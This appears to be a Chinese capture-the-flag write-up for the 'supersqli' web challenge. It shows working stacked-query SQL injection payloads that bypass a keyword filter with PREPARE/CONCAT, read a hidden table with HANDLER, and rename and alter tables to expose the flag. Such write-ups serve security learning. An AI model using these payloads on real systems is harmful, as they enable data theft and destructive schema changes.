当前位置:网站首页>攻防世界(web篇)---supersqli
攻防世界(web篇)---supersqli
2022-06-12 18:51:00 【肖萧然】
文章目录
攻防世界(web篇)—supersqli
拿到题目后,发现是单引号报错字符型注入

order by 2的时候页面正常回显,order by 3的时候页面出错

接下来union查询,发现被过滤了很多语句

绕过过滤,下面有几种方法
堆叠查询+预编译
查表

查字段

采用预编译的方式查,但被过滤

strstr区分大小写
?inject=1';set @sql = CONCAT('sele','ct * from `1919810931114514`;');Prepare xiao from @sql;EXECUTE xiao;

handler查询
handler语法


查询payload
?inject=1';handler `1919810931114514` open;handler `1919810931114514` read first; --+

堆叠查询+改表名
原理解析
一开始就是查询word表中的数据,所以我们可以利用数据库修改表名和列名的方法
先把原来的words表名字改成别的,再将1919810931114514表的名字改为words
再将改完名字后的表中的flag字段改为 id (id同样需要show columns from word得到)
然后我们用1’ or 1=1 --+直接就能得到flag
修改payload
?inject=1';alter table words rename to aaaa;alter table `1919810931114514` rename to words;alter table words change flag id varchar(100);











边栏推荐
猜你喜欢

Common methods and examples of defect detection based on Halcon

leetcode:5259. 计算应缴税款总额【简单模拟 + 看看在哪个区间】
![leetcode:6094. Company name [group enumeration + cannot repeat set intersection + product Cartesian product (repeat indicates length)]](/img/6c/f42bbec7ff2ec0d104f1dd2c97eab6.png)
leetcode:6094. Company name [group enumeration + cannot repeat set intersection + product Cartesian product (repeat indicates length)]

MySQL - > > symbol usage JSON related
![Two months later, my second listing anniversary [June 2, 2022]](/img/55/6678659a552ba7dbace330d8b9c3ae.png)
Two months later, my second listing anniversary [June 2, 2022]

从应无所住说起

【矩阵论 & 图论】期末考试复习思维导图

超级重磅!Apache Hudi多模索引对查询优化高达30倍

kali局域网ARP欺骗(arpspoof)并监听(mitmproxy)局域内其它主机上网记录

嵌入式开发:固件工程师的6项必备技能
随机推荐
一种灵活注入 Istio Sidecar 的方案探索
Basic SQL statement - select (single table query)
数据库全量SQL分析与审计系统性能优化之旅
leetcode:5289. 公平分发饼干【看数据范围 + dfs剪枝】
wireshark基本使用命令
I was badly hurt by the eight part essay...
kali通过iptables实现端口转发功能
Getting started with the go language is simple: read / write lock
leetcode:5259. Calculate the total tax payable [simple simulation + see which range]
Analyzing mobx responsive refresh mechanism from source code
leetcode:5270. Minimum path cost in Grid [simple level DP]
[0008] unordered list
Leetcode 1049. Weight of the last stone II
Voir les pages du site
io.seata.common.exception.FrameworkException: can not connect to services-server.
OpenGL shadow implementation (hard shadow)
JS get the start and end dates of this week according to the nth week of the N year
OpenGL shadow implementation (soft shadow)
Leetcode 1049. 最后一块石头的重量 II
美团智能配送系统的运筹优化实战-笔记